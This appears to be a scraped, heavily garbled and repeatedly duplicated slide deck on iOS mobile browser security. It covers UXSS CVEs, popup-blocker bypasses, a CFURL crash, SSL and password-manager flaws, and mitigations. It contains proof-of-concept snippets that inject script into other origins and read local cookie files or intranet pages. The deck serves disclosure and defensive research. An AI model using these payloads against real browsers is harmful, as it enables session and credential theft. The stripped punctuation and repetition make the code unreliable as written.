wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 42: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/42.jpg)
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 43: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/43.jpg)
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 44: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/44.jpg)
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
